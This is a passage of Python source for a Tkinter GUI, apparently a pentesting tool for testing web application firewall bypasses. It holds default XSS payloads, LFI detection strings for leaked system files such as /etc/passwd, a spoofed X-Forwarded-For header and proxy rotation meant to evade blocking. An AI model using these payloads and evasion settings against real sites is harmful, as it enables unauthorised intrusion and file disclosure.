#!/usr/bin/env python3
"""
GUI WAF Bypass Tester V15 - Futuristic Edition
Cyberpunk-style interface with neon colors and modern design
- Custom theme color picker with 5 preset themes
- Stop scanning functionality with progress tracking
- Proxy rotation every 20 requests
- AI-powered payload categorization
- 404 Bypass Testing
- Auto-load payloads from organized directories
"""
import threading
import time
import requests
import tkinter as tk
import os
import glob
from tkinter import ttk, scrolledtext, messagebox, filedialog, font, colorchooser
from concurrent.futures import ThreadPoolExecutor, as_completed
import re
from collections import defaultdict
import random

class FuturisticWafTester(tk.Tk):
    def __init__(self):
        super().__init__()
        self.title("🛡️ Advanced WAF Bypass Tester - Pentesting Toolkit")
        self.iconbitmap(default=None)  # This removes the default Tkinter icon
        self.configure(bg='#0D1117')
        
        # Auto-maximize
        self.update_idletasks()
        try: self.state('zoomed')
        except: pass
        
        # Define color scheme
        self.colors = {
            'bg_dark': '#0D1117',      # Deep dark blue-black (GitHub dark mode)
            'bg_medium': '#161B22',    # Slightly lighter dark blue
            'bg_light': '#21262D',     # Even lighter dark blue for highlights
            'accent': '#58A6FF',       # Bright blue - primary accent
            'accent2': '#EC6CB9',      # Bright pink - secondary accent
            'accent3': '#79C0FF',      # Light blue - tertiary accent
            'text': '#F0F6FC',         # Almost white text
            'text_dim': '#8B949E',     # Dimmed gray text
            'success': '#7CE38B',      # Soft green for success
            'error': '#F85149',        # Soft red for errors
            'warning': '#DBAB0A'       # Soft yellow for warnings
        }
        
        # Configure styles
        self.setup_styles()
        
        # ASCII Art Header
        header_frame = tk.Frame(self, bg=self.colors['bg_dark'])
        header_frame.pack(fill='x', pady=10)
        
        ascii_art = """
╦ ╦╔═╗╔═╗  ╔╗ ╦ ╦╔═╗╔═╗╔═╗╔═╗  ╔╦╗╔═╗╔═╗╔╦╗╔═╗╦═╗
║║║╠═╣╠╣   ╠╩╗╚╦╝╠═╝╠═╣╚═╗╚═╗   ║ ║╣ ╚═╗ ║ ║╣ ╠╦╝
╚╩╝╩ ╩╚    ╚═╝ ╩ ╩  ╩ ╩╚═╝╚═╝   ╩ ╚═╝╚═╝ ╩ ╚═╝╩╚═"""
        
        self.ascii_label = tk.Label(header_frame, text=ascii_art, 
                              font=('Courier', 12, 'bold'),
                              fg=self.colors['accent'], bg=self.colors['bg_dark'])
        self.ascii_label.pack()
        
        # Store references to all widgets for theme updates
        self.themed_widgets = []
        
        # Futuristic Toolbar
        self.toolbar_frame = tk.Frame(self, bg=self.colors['bg_medium'], height=60)
        self.toolbar_frame.pack(fill='x', padx=20, pady=(0, 10))
        self.toolbar_frame.pack_propagate(False)
        self.themed_widgets.append(self.toolbar_frame)
        
        # Toolbar buttons with icons
        btn_style = {'font': ('Arial', 10, 'bold'), 'width': 15, 'height': 2}
        
        self.load_btn = self.create_neon_button(self.toolbar_frame, "📁 LOAD PAYLOADS ▼", self.show_load_payloads_menu, self.colors['accent3'])
        self.load_btn.pack(side='left', padx=10, pady=10)
        self.load_btn.bind("<Button-1>", self.show_load_payloads_menu)
        
        self.start_btn = self.create_neon_button(self.toolbar_frame, "🚀 START SCAN", self.start_testing, self.colors['accent'])
        self.start_btn.pack(side='left', padx=10, pady=10)
        
        self.stop_btn = self.create_neon_button(self.toolbar_frame, "🛑 STOP", self.stop_testing, self.colors['error'])
        self.stop_btn.pack(side='left', padx=10, pady=10)
        self.stop_btn.config(state='disabled')
        
        self.clear_btn = self.create_neon_button(self.toolbar_frame, "🗑️ CLEAR", self.clear_results, self.colors['accent2'])
        self.clear_btn.pack(side='left', padx=10, pady=10)
        
        self.analyze_btn = self.create_neon_button(self.toolbar_frame, "🤖 AI ANALYZE", self.analyze_200s, self.colors['warning'])
        self.analyze_btn.pack(side='left', padx=10, pady=10)
        
        self.theme_btn = self.create_neon_button(self.toolbar_frame, "🎨 THEME", self.open_theme_settings, self.colors['accent3'])
        self.theme_btn.pack(side='left', padx=10, pady=10)
        
        # Thread control
        self.thread_frame = tk.Frame(self.toolbar_frame, bg=self.colors['bg_medium'])
        self.thread_frame.pack(side='right', padx=20)
        self.themed_widgets.append(self.thread_frame)
        
        self.thread_label = tk.Label(self.thread_frame, text="THREADS:", font=('Arial', 10, 'bold'),
                fg=self.colors['text'], bg=self.colors['bg_medium'])
        self.thread_label.pack(side='left', padx=5)
        self.themed_widgets.append(self.thread_label)
        
        self.thread_count = tk.IntVar(value=10)
        self.thread_spin = tk.Spinbox(self.thread_frame, from_=1, to=100, textvariable=self.thread_count,
                                width=5, font=('Arial', 10), bg=self.colors['bg_light'],
                                fg=self.colors['accent'], insertbackground=self.colors['accent'])
        self.thread_spin.pack(side='left')
        self.themed_widgets.append(self.thread_spin)
        
        # Status bar
        self.status_var = tk.StringVar(value="⚡ READY TO HACK")
        self.status_bar = tk.Label(self, textvariable=self.status_var, 
                             font=('Arial', 10, 'bold'), fg=self.colors['accent'],
                             bg=self.colors['bg_dark'], anchor='w')
        self.status_bar.pack(fill='x', padx=20, pady=5)
        self.themed_widgets.append(self.status_bar)
        
        # Main content with tabs
        self.notebook = ttk.Notebook(self)
        self.notebook.pack(fill='both', expand=True, padx=20, pady=10)
        
        # Tab 1: Configuration & Testing
        self.setup_testing_tab()
        
        # Tab 2: AI Analysis
        self.setup_analysis_tab()
        
        # Tab 3: XSS Testing
        self.setup_xss_tab()
        
        # Tab 4: LFI Testing
        self.setup_lfi_tab()
        
        # Tab 5: 404 Bypass Testing
        self.setup_404_tab()
        
        # Store results
        self.all_results = []
        self.xss_results = []
        self.lfi_results = []
        self.bypass_404_results = []
        
        # Scanning control
        self.stop_scanning = False
        self.scanning_thread = None
        
        # Baseline content length
        self.baseline_content_length = None
        
        # Start animation
        self.animate_status()
    
    def setup_styles(self):
        """Configure ttk styles for modern look"""
        style = ttk.Style()
        
        # Configure notebook
        style.configure('TNotebook', background=self.colors['bg_dark'], borderwidth=0)
        style.configure('TNotebook.Tab', background=self.colors['bg_medium'], 
                       foreground=self.colors['text_dim'], padding=[25, 12],
                       font=('Segoe UI', 10, 'bold'))
        style.map('TNotebook.Tab', 
                 background=[('selected', self.colors['bg_dark'])],
                 foreground=[('selected', self.colors['accent'])])
        
        # Configure frames
        style.configure('Dark.TFrame', background=self.colors['bg_dark'])
        style.configure('Medium.TFrame', background=self.colors['bg_medium'])
        
        # Configure Treeview
        style.configure('Treeview', 
                       background=self.colors['bg_dark'],
                       foreground=self.colors['text'],
                       fieldbackground=self.colors['bg_dark'],
                       borderwidth=0,
                       font=('Segoe UI', 9))
        style.configure('Treeview.Heading', 
                       background=self.colors['bg_medium'],
                       foreground=self.colors['accent'],
                       font=('Segoe UI', 10, 'bold'),
                       relief='flat')
        style.map('Treeview', 
                 background=[('selected', self.colors['bg_light'])],
                 foreground=[('selected', self.colors['accent'])])
        
        # Configure Scrollbar
        style.configure('TScrollbar', 
                       background=self.colors['bg_medium'],
                       troughcolor=self.colors['bg_dark'],
                       borderwidth=0,
                       arrowcolor=self.colors['accent'])
        # Configure labels
        style.configure('Heading.TLabel', background=self.colors['bg_medium'],
                       foreground=self.colors['accent'], font=('Arial', 12, 'bold'))
        
        # Configure treeview
        style.configure("Treeview", background=self.colors['bg_dark'],
                       foreground=self.colors['text'], fieldbackground=self.colors['bg_dark'])
        style.configure("Treeview.Heading", background=self.colors['bg_light'],
                       foreground=self.colors['accent'])
    
    def create_neon_button(self, parent, text, command, color):
        """Create a modern button with subtle animation effects"""
        btn = tk.Button(parent, text=text, command=command,
                       font=('Segoe UI', 10, 'bold'), fg='white',
                       bg=color, activebackground=self.lighten_color(color, 0.2),
                       activeforeground='white', bd=0, relief='flat',
                       padx=15, pady=8, cursor='hand2')
        
        # Store button reference with its color
        btn.neon_color = color
        self.themed_widgets.append(btn)
        
        # Hover effects
        def on_enter(e):
            btn.config(bg=self.lighten_color(color, 0.2))
        
        def on_leave(e):
            btn.config(bg=color)
        
        btn.bind("<Enter>", on_enter)
        btn.bind("<Leave>", on_leave)
        
        return btn
    
    def lighten_color(self, color_hex, factor=0.2):
        """Lighten a color by the given factor"""
        # Convert hex to RGB
        color_hex = color_hex.lstrip('#')
        r, g, b = int(color_hex[0:2], 16), int(color_hex[2:4], 16), int(color_hex[4:6], 16)
        
        # Lighten
        r = min(255, int(r + (255 - r) * factor))
        g = min(255, int(g + (255 - g) * factor))
        b = min(255, int(b + (255 - b) * factor))
        
        # Convert back to hex
        return f'#{r:02x}{g:02x}{b:02x}'
    
    def setup_testing_tab(self):
        """Setup the main testing interface"""
        test_frame = ttk.Frame(self.notebook, style='Dark.TFrame')
        self.notebook.add(test_frame, text="⚔️ TESTING")
        
        # Main container
        main_container = tk.Frame(test_frame, bg=self.colors['bg_dark'])
        main_container.pack(fill='both', expand=True, padx=10, pady=10)
        self.themed_widgets.append(main_container)
        
        # Left panel - Configuration
        self.left_panel = tk.Frame(main_container, bg=self.colors['bg_medium'], width=400)
        self.left_panel.pack(side='left', fill='y', padx=(0, 10))
        self.left_panel.pack_propagate(False)
        self.themed_widgets.append(self.left_panel)
        
        # Configuration sections
        self.create_config_section(self.left_panel, "🎯 TARGET", self.create_target_config)
        self.create_config_section(self.left_panel, "📡 HTTP HEADERS", self.create_headers_config)
        self.create_config_section(self.left_panel, "🌐 PROXY CHAIN", self.create_proxy_config)
        self.create_config_section(self.left_panel, "💉 PAYLOADS", self.create_tokens_config)
        
        # Right panel - Results
        self.right_panel = tk.Frame(main_container, bg=self.colors['bg_dark'])
        self.right_panel.pack(side='right', fill='both', expand=True)
        self.themed_widgets.append(self.right_panel)
        
        # Results section
        self.results_frame = tk.LabelFrame(self.right_panel, text="📊 SCAN RESULTS",
                                     font=('Arial', 12, 'bold'), fg=self.colors['accent'],
                                     bg=self.colors['bg_medium'], bd=2, relief='groove')
        self.results_frame.pack(fill='both', expand=True, pady=(0, 10))
        self.themed_widgets.append(self.results_frame)
        
        # Treeview with custom style
        tree_frame = tk.Frame(self.results_frame, bg=self.colors['bg_medium'])
        tree_frame.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(tree_frame)
        
        cols = ('Token', 'Status', 'Code')
        self.tree = ttk.Treeview(tree_frame, columns=cols, show='headings', height=15)
        for col in cols:
            self.tree.heading(col, text=col.upper())
            if col == 'Token':
                self.tree.column(col, width=300)
            elif col == 'Status':
                self.tree.column(col, width=150)
            else:
                self.tree.column(col, width=80)
        
        # Scrollbar
        scrollbar = ttk.Scrollbar(tree_frame, orient='vertical', command=self.tree.yview)
        self.tree.configure(yscrollcommand=scrollbar.set)
        scrollbar.pack(side='right', fill='y')
        self.tree.pack(side='left', fill='both', expand=True)
        
        # Console log
        self.console_frame = tk.LabelFrame(self.right_panel, text="💻 CONSOLE OUTPUT",
                                     font=('Arial', 12, 'bold'), fg=self.colors['accent'],
                                     bg=self.colors['bg_medium'], bd=2, relief='groove')
        self.console_frame.pack(fill='both', expand=True)
        self.themed_widgets.append(self.console_frame)
        
        self.log_text = scrolledtext.ScrolledText(self.console_frame, height=10,
                                                  bg='black', fg=self.colors['accent'],
                                                  font=('Courier', 9), insertbackground=self.colors['accent'])
        self.log_text.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(self.log_text)
    
    def create_config_section(self, parent, title, content_func):
        """Create a configuration section with modern styling"""
        # Create section header
        header_frame = tk.Frame(parent, bg=self.colors['bg_medium'])
        header_frame.pack(fill='x', padx=10, pady=(15, 5))
        self.themed_widgets.append(header_frame)
        
        # Add icon and title with accent line
        title_label = tk.Label(header_frame, text=title, font=('Segoe UI', 12, 'bold'),
                              fg=self.colors['accent'], bg=self.colors['bg_medium'],
                              anchor='w')
        title_label.pack(side='top', fill='x', pady=(0, 5))
        self.themed_widgets.append(title_label)
        
        # Add subtle accent line
        accent_line = tk.Frame(header_frame, height=2, bg=self.colors['accent3'])
        accent_line.pack(fill='x', pady=(0, 10))
        self.themed_widgets.append(accent_line)
        
        # Create content frame
        content_frame = tk.Frame(parent, bg=self.colors['bg_medium'])
        content_frame.pack(fill='x', padx=10, pady=5)
        self.themed_widgets.append(content_frame)
        
        # Call the content creation function
        content_func(content_frame)
    
    def create_target_config(self, parent):
        """Target configuration section"""
        # Method selection
        method_frame = tk.Frame(parent, bg=self.colors['bg_medium'])
        method_frame.pack(fill='x', padx=10, pady=5)
        self.themed_widgets.append(method_frame)
        
        self.method = tk.StringVar(value='GET')
        for method in ['GET', 'POST']:
            rb = tk.Radiobutton(method_frame, text=method, variable=self.method,
                               value=method, font=('Arial', 10), fg=self.colors['text'],
                               bg=self.colors['bg_medium'], selectcolor=self.colors['bg_dark'],
                               activebackground=self.colors['bg_medium'])
            rb.pack(side='left', padx=10)
            self.themed_widgets.append(rb)
        
        # URL input
        url_label = tk.Label(parent, text="URL Template:", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium'])
        url_label.pack(anchor='w', padx=10)
        self.themed_widgets.append(url_label)
        
        self.url_entry = tk.Entry(parent, font=('Arial', 10), bg=self.colors['bg_dark'],
                                 fg=self.colors['text'], insertbackground=self.colors['accent'])
        self.url_entry.insert(0, "https://ctf-waf-bypass.com/page.php?id={token}")
        self.url_entry.pack(fill='x', padx=10, pady=(0, 5))
        self.themed_widgets.append(self.url_entry)
        
        # Body template
        body_label = tk.Label(parent, text="Body Template (POST):", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium'])
        body_label.pack(anchor='w', padx=10)
        self.themed_widgets.append(body_label)
        
        self.body_text = tk.Text(parent, height=3, font=('Arial', 10),
                                bg=self.colors['bg_dark'], fg=self.colors['text'],
                                insertbackground=self.colors['accent'])
        self.body_text.insert('1.0', "param={token}")
        self.body_text.pack(fill='x', padx=10, pady=(0, 5))
        self.themed_widgets.append(self.body_text)
    
    def create_headers_config(self, parent):
        """Headers configuration section"""
        self.headers_text = scrolledtext.ScrolledText(parent, height=5, font=('Courier', 9),
                                                     bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                     insertbackground=self.colors['accent'])
        self.headers_text.insert('1.0',
            "Host: ctf-waf-bypass.com\n"
            "User-Agent: Mozilla/5.0 (Hacker Edition)\n"
            "Accept: text/html,application/json\n"
            "X-Forwarded-For: 127.0.0.1\n"
        )
        self.headers_text.pack(fill='x', padx=10, pady=5)
        self.themed_widgets.append(self.headers_text)
    
    def create_proxy_config(self, parent):
        """Proxy configuration section"""
        # Enable checkbox
        self.proxy_enabled = tk.BooleanVar(value=False)
        cb = tk.Checkbutton(parent, text="Enable Proxy Rotation (every 20 requests)",
                           variable=self.proxy_enabled, font=('Arial', 10),
                           fg=self.colors['text'], bg=self.colors['bg_medium'],
                           selectcolor=self.colors['bg_dark'],
                           activebackground=self.colors['bg_medium'])
        cb.pack(anchor='w', padx=10, pady=5)
        self.themed_widgets.append(cb)
        
        # Proxy list
        self.proxy_text = scrolledtext.ScrolledText(parent, height=4, font=('Courier', 9),
                                                   bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                   insertbackground=self.colors['accent'])
        self.proxy_text.insert('1.0', "http://proxy1:8080\nsocks5://proxy2:1080")
        self.proxy_text.pack(fill='x', padx=10, pady=(0, 5))
        self.themed_widgets.append(self.proxy_text)
    
    def create_tokens_config(self, parent):
        """Tokens configuration section"""
        self.tokens_text = scrolledtext.ScrolledText(parent, height=8, font=('Courier', 9),
                                                    bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                    insertbackground=self.colors['accent'])
        self.tokens_text.pack(fill='both', expand=True, padx=10, pady=5)
        self.themed_widgets.append(self.tokens_text)
    
    def setup_analysis_tab(self):
        """Setup the AI analysis tab"""
        analysis_frame = ttk.Frame(self.notebook, style='Dark.TFrame')
        self.notebook.add(analysis_frame, text="🤖 AI ANALYSIS")
        
        # Main container
        container = tk.Frame(analysis_frame, bg=self.colors['bg_dark'])
        container.pack(fill='both', expand=True, padx=20, pady=20)
        self.themed_widgets.append(container)
        
        # Header
        self.ai_header = tk.Label(container, text="ARTIFICIAL INTELLIGENCE PAYLOAD ANALYZER",
                         font=('Arial', 16, 'bold'), fg=self.colors['accent'],
                         bg=self.colors['bg_dark'])
        self.ai_header.pack(pady=(0, 20))
        self.themed_widgets.append(self.ai_header)
        
        # Analysis output
        self.output_frame = tk.LabelFrame(container, text="📈 CATEGORIZATION RESULTS",
                                    font=('Arial', 12, 'bold'), fg=self.colors['accent'],
                                    bg=self.colors['bg_medium'], bd=2, relief='groove')
        self.output_frame.pack(fill='both', expand=True)
        self.themed_widgets.append(self.output_frame)
        
        self.analysis_text = scrolledtext.ScrolledText(self.output_frame, font=('Courier', 10),
                                                      bg='black', fg=self.colors['accent'],
                                                      insertbackground=self.colors['accent'])
        self.analysis_text.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(self.analysis_text)
    
    def setup_xss_tab(self):
        """Setup the XSS testing tab"""
        xss_frame = ttk.Frame(self.notebook, style='Dark.TFrame')
        self.notebook.add(xss_frame, text="🎯 XSS TESTING")
        
        # Main container
        main_container = tk.Frame(xss_frame, bg=self.colors['bg_dark'])
        main_container.pack(fill='both', expand=True, padx=10, pady=10)
        self.themed_widgets.append(main_container)
        
        # Left panel - XSS Configuration
        xss_left_panel = tk.Frame(main_container, bg=self.colors['bg_medium'], width=400)
        xss_left_panel.pack(side='left', fill='y', padx=(0, 10))
        xss_left_panel.pack_propagate(False)
        self.themed_widgets.append(xss_left_panel)
        
        # XSS specific configuration
        self.create_config_section(xss_left_panel, "🎯 XSS TARGET", self.create_xss_target_config)
        self.create_config_section(xss_left_panel, "🔍 XSS PAYLOADS", self.create_xss_payloads_config)
        
        # Right panel - XSS Results
        xss_right_panel = tk.Frame(main_container, bg=self.colors['bg_dark'])
        xss_right_panel.pack(side='right', fill='both', expand=True)
        self.themed_widgets.append(xss_right_panel)
        
        # XSS Control buttons
        xss_control_frame = tk.Frame(xss_right_panel, bg=self.colors['bg_dark'])
        xss_control_frame.pack(fill='x', pady=(0, 10))
        
        self.xss_start_btn = self.create_neon_button(xss_control_frame, "🚀 START XSS SCAN", 
                                                     self.start_xss_testing, self.colors['accent'])
        self.xss_start_btn.pack(side='left', padx=5)
        
        self.xss_stop_btn = self.create_neon_button(xss_control_frame, "🛑 STOP", 
                                                    self.stop_xss_testing, self.colors['error'])
        self.xss_stop_btn.pack(side='left', padx=5)
        self.xss_stop_btn.config(state='disabled')
        
        self.xss_clear_btn = self.create_neon_button(xss_control_frame, "🗑️ CLEAR", 
                                                     self.clear_xss_results, self.colors['accent2'])
        self.xss_clear_btn.pack(side='left', padx=5)
        
        # XSS Results section
        xss_results_frame = tk.LabelFrame(xss_right_panel, text="🎯 XSS SCAN RESULTS (200 OK + ALLOWED ONLY)",
                                         font=('Arial', 12, 'bold'), fg=self.colors['success'],
                                         bg=self.colors['bg_medium'], bd=2, relief='groove')
        xss_results_frame.pack(fill='both', expand=True, pady=(0, 10))
        self.themed_widgets.append(xss_results_frame)
        
        # XSS Treeview
        xss_tree_frame = tk.Frame(xss_results_frame, bg=self.colors['bg_medium'])
        xss_tree_frame.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(xss_tree_frame)
        
        cols = ('Payload', 'Status', 'Code', 'Content-Length', 'Length-Diff')
        self.xss_tree = ttk.Treeview(xss_tree_frame, columns=cols, show='headings', height=15)
        for col in cols:
            self.xss_tree.heading(col, text=col.upper())
            if col == 'Payload':
                self.xss_tree.column(col, width=300)
            else:
                self.xss_tree.column(col, width=120)
        
        # Scrollbar
        xss_scrollbar = ttk.Scrollbar(xss_tree_frame, orient='vertical', command=self.xss_tree.yview)
        self.xss_tree.configure(yscrollcommand=xss_scrollbar.set)
        xss_scrollbar.pack(side='right', fill='y')
        self.xss_tree.pack(side='left', fill='both', expand=True)
        
        # XSS Console log
        xss_console_frame = tk.LabelFrame(xss_right_panel, text="💻 XSS CONSOLE OUTPUT",
                                         font=('Arial', 12, 'bold'), fg=self.colors['accent'],
                                         bg=self.colors['bg_medium'], bd=2, relief='groove')
        xss_console_frame.pack(fill='both', expand=True)
        self.themed_widgets.append(xss_console_frame)
        
        self.xss_log_text = scrolledtext.ScrolledText(xss_console_frame, height=10,
                                                      bg='black', fg=self.colors['accent'],
                                                      font=('Courier', 9), insertbackground=self.colors['accent'])
        self.xss_log_text.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(self.xss_log_text)
    
    def create_xss_target_config(self, parent):
        """XSS target configuration"""
        tk.Label(parent, text="Target URL:", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium']).pack(anchor='w', padx=10, pady=(10, 0))
        
        self.xss_url_entry = tk.Entry(parent, font=('Arial', 10), bg=self.colors['bg_dark'],
                                     fg=self.colors['text'], insertbackground=self.colors['accent'])
        self.xss_url_entry.insert(0, "https://example.com/search?q={payload}")
        self.xss_url_entry.pack(fill='x', padx=10, pady=(0, 10))
        self.themed_widgets.append(self.xss_url_entry)
        
        tk.Label(parent, text="Baseline test value:", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium']).pack(anchor='w', padx=10)
        
        self.xss_baseline_entry = tk.Entry(parent, font=('Arial', 10), bg=self.colors['bg_dark'],
                                          fg=self.colors['text'], insertbackground=self.colors['accent'])
        self.xss_baseline_entry.insert(0, "test")
        self.xss_baseline_entry.pack(fill='x', padx=10, pady=(0, 10))
        self.themed_widgets.append(self.xss_baseline_entry)
    
    def create_xss_payloads_config(self, parent):
        """XSS payloads configuration"""
        # Load XSS payloads button
        load_xss_btn = self.create_neon_button(parent, "📁 LOAD XSS PAYLOADS", 
                                              self.load_xss_payloads, self.colors['accent3'])
        load_xss_btn.pack(fill='x', padx=10, pady=10)
        
        # XSS payloads text area
        self.xss_payloads_text = scrolledtext.ScrolledText(parent, height=15, font=('Courier', 9),
                                                          bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                          insertbackground=self.colors['accent'])
        self.xss_payloads_text.insert('1.0', 
            "<script>alert(1)</script>\n"
            "<img src=x onerror=alert(1)>\n"
            "<svg onload=alert(1)>\n"
            "javascript:alert(1)\n"
            "<iframe src=javascript:alert(1)>\n"
        )
        self.xss_payloads_text.pack(fill='both', expand=True, padx=10, pady=(0, 10))
        self.themed_widgets.append(self.xss_payloads_text)
    
    def load_xss_payloads(self):
        """Load XSS payloads from file or auto-load from directory"""
        # Create a popup menu to choose the source
        menu = tk.Menu(self, tearoff=0, bg=self.colors['bg_dark'], fg=self.colors['text'],
                      activebackground=self.colors['bg_light'], activeforeground=self.colors['accent'])
        menu.add_command(label="📄 From File...", command=self.load_xss_payloads_from_file)
        menu.add_command(label="🔄 Auto-Load from Directory", 
                        command=lambda: self.auto_load_payloads('xss'))
        
        # Show the menu at the current mouse position
        try:
            menu.tk_popup(self.winfo_pointerx(), self.winfo_pointery())
        finally:
            menu.grab_release()
    
    def load_xss_payloads_from_file(self):
        """Load XSS payloads from file"""
        filepath = filedialog.askopenfilename(
            title="Select XSS Payload File",
            filetypes=[("Text files", "*.txt"), ("All files", "*.*")]
        )
        if not filepath:
            return
        
        try:
            with open(filepath, 'r', encoding='utf-8') as f:
                payloads = [line.strip() for line in f if line.strip()]
            
            self.xss_payloads_text.delete('1.0', 'end')
            self.xss_payloads_text.insert('1.0', '\n'.join(payloads))
            
            self.xss_log("✅ Loaded {} XSS payloads from {}".format(len(payloads), filepath), 'success')
        except Exception as e:
            self.xss_log(f"❌ Error loading file: {str(e)}", 'error')
            messagebox.showerror("Error", f"Failed to load file: {str(e)}")
    
    def xss_log(self, message, level='info'):
        """Log message to XSS console"""
        timestamp = time.strftime('%H:%M:%S')
        
        # Color coding
        if level == 'error':
            color = self.colors['error']
        elif level == 'success':
            color = self.colors['success']
        elif level == 'warning':
            color = self.colors['warning']
        else:
            color = self.colors['text']
        
        self.xss_log_text.insert('end', f"[{timestamp}] ", 'timestamp')
        self.xss_log_text.insert('end', f"{message}\n", level)
        
        # Configure tags
        self.xss_log_text.tag_config('timestamp', foreground=self.colors['text_dim'])
        self.xss_log_text.tag_config(level, foreground=color)
        self.xss_log_text.see('end')
    
    def clear_xss_results(self):
        """Clear XSS results"""
        for item in self.xss_tree.get_children():
            self.xss_tree.delete(item)
        self.xss_log_text.delete('1.0', 'end')
        self.xss_results = []
        self.baseline_content_length = None
    
    def stop_xss_testing(self):
        """Stop XSS testing"""
        self.stop_scanning = True
        self.xss_stop_btn.config(state='disabled')
        self.xss_log("🛑 Stopping XSS scan...", 'warning')
        
    def setup_lfi_tab(self):
        """Setup the LFI testing tab"""
        lfi_frame = ttk.Frame(self.notebook, style='Dark.TFrame')
        self.notebook.add(lfi_frame, text="📁 LFI TESTING")
        
        # Main container
        main_container = tk.Frame(lfi_frame, bg=self.colors['bg_dark'])
        main_container.pack(fill='both', expand=True, padx=10, pady=10)
        self.themed_widgets.append(main_container)
        
        # Left panel - LFI Configuration
        lfi_left_panel = tk.Frame(main_container, bg=self.colors['bg_medium'], width=400)
        lfi_left_panel.pack(side='left', fill='y', padx=(0, 10))
        lfi_left_panel.pack_propagate(False)
        self.themed_widgets.append(lfi_left_panel)
        
        # LFI specific configuration
        self.create_config_section(lfi_left_panel, "📁 LFI TARGET", self.create_lfi_target_config)
        self.create_config_section(lfi_left_panel, "📑 LFI PAYLOADS", self.create_lfi_payloads_config)
        
        # Right panel - LFI Results
        lfi_right_panel = tk.Frame(main_container, bg=self.colors['bg_dark'])
        lfi_right_panel.pack(side='right', fill='both', expand=True)
        self.themed_widgets.append(lfi_right_panel)
        
        # LFI Control buttons
        lfi_control_frame = tk.Frame(lfi_right_panel, bg=self.colors['bg_dark'])
        lfi_control_frame.pack(fill='x', pady=(0, 10))
        
        self.lfi_start_btn = self.create_neon_button(lfi_control_frame, "🚀 START LFI SCAN", 
                                                    self.start_lfi_testing, self.colors['accent'])
        self.lfi_start_btn.pack(side='left', padx=5)
        
        self.lfi_stop_btn = self.create_neon_button(lfi_control_frame, "🛑 STOP", 
                                                   self.stop_lfi_testing, self.colors['error'])
        self.lfi_stop_btn.pack(side='left', padx=5)
        self.lfi_stop_btn.config(state='disabled')
        
        self.lfi_clear_btn = self.create_neon_button(lfi_control_frame, "🗑️ CLEAR", 
                                                    self.clear_lfi_results, self.colors['accent2'])
        self.lfi_clear_btn.pack(side='left', padx=5)
        
        # LFI Results section
        lfi_results_frame = tk.LabelFrame(lfi_right_panel, text="📁 LFI SCAN RESULTS",
                                        font=('Arial', 12, 'bold'), fg=self.colors['success'],
                                        bg=self.colors['bg_medium'], bd=2, relief='groove')
        lfi_results_frame.pack(fill='both', expand=True, pady=(0, 10))
        self.themed_widgets.append(lfi_results_frame)
        
        # LFI Treeview
        lfi_tree_frame = tk.Frame(lfi_results_frame, bg=self.colors['bg_medium'])
        lfi_tree_frame.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(lfi_tree_frame)
        
        cols = ('Payload', 'Status', 'Code', 'Content-Length', 'File Found')
        self.lfi_tree = ttk.Treeview(lfi_tree_frame, columns=cols, show='headings', height=15)
        for col in cols:
            self.lfi_tree.heading(col, text=col.upper())
            if col == 'Payload':
                self.lfi_tree.column(col, width=300)
            else:
                self.lfi_tree.column(col, width=120)
        
        # Scrollbar
        lfi_scrollbar = ttk.Scrollbar(lfi_tree_frame, orient='vertical', command=self.lfi_tree.yview)
        self.lfi_tree.configure(yscrollcommand=lfi_scrollbar.set)
        lfi_scrollbar.pack(side='right', fill='y')
        self.lfi_tree.pack(side='left', fill='both', expand=True)
        
        # LFI Console log
        lfi_console_frame = tk.LabelFrame(lfi_right_panel, text="💻 LFI CONSOLE OUTPUT",
                                        font=('Arial', 12, 'bold'), fg=self.colors['accent'],
                                        bg=self.colors['bg_medium'], bd=2, relief='groove')
        lfi_console_frame.pack(fill='both', expand=True)
        self.themed_widgets.append(lfi_console_frame)
        
        self.lfi_log_text = scrolledtext.ScrolledText(lfi_console_frame, height=10,
                                                     bg='black', fg=self.colors['accent'],
                                                     font=('Courier', 9), insertbackground=self.colors['accent'])
        self.lfi_log_text.pack(fill='both', expand=True, padx=5, pady=5)
        self.themed_widgets.append(self.lfi_log_text)
    
    def create_lfi_target_config(self, parent):
        """LFI target configuration"""
        tk.Label(parent, text="Target URL:", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium']).pack(anchor='w', padx=10, pady=(10, 0))
        
        self.lfi_url_entry = tk.Entry(parent, font=('Arial', 10), bg=self.colors['bg_dark'],
                                    fg=self.colors['text'], insertbackground=self.colors['accent'])
        self.lfi_url_entry.insert(0, "https://example.com/page.php?file={payload}")
        self.lfi_url_entry.pack(fill='x', padx=10, pady=(0, 10))
        self.themed_widgets.append(self.lfi_url_entry)
        
        # File signatures to detect successful LFI
        tk.Label(parent, text="Detection strings (one per line):", font=('Arial', 10),
                fg=self.colors['text_dim'], bg=self.colors['bg_medium']).pack(anchor='w', padx=10)
        
        self.lfi_detection_text = scrolledtext.ScrolledText(parent, height=4, font=('Courier', 9),
                                                          bg=self.colors['bg_dark'], fg=self.colors['text'],
                                                          insertbackground=self.colors['accent'])
        self.lfi_detection_text.insert('1.0',
            "root:x:\n"
            "[boot loader]\n"
            "uid=\n"
            "Directory of\n"
            "Volume Serial Number\n"
        )
        self.lfi_detection_text.pack(fill='x', padx=10, pady=(0, 10))
        self.themed_widgets.append(self.lfi_detection_text)
    
    def create_lfi_payloads_config(self, parent):
        """LFI payloads configuration"""
        # Load LFI payloads button
        load_lfi_btn = self.create_neon_button(parent, "📁 LOAD LFI PAYLOADS", 
                                             self.load_lfi_payloads, self.colors['accent3'])
        load_lfi_btn.pack(fill='x', padx=10, pady=10)
        
        # LFI payloads text area
        self.lfi_payloads_text = scrolledtext.ScrolledText(parent, height=15, font=('Courier', 9),
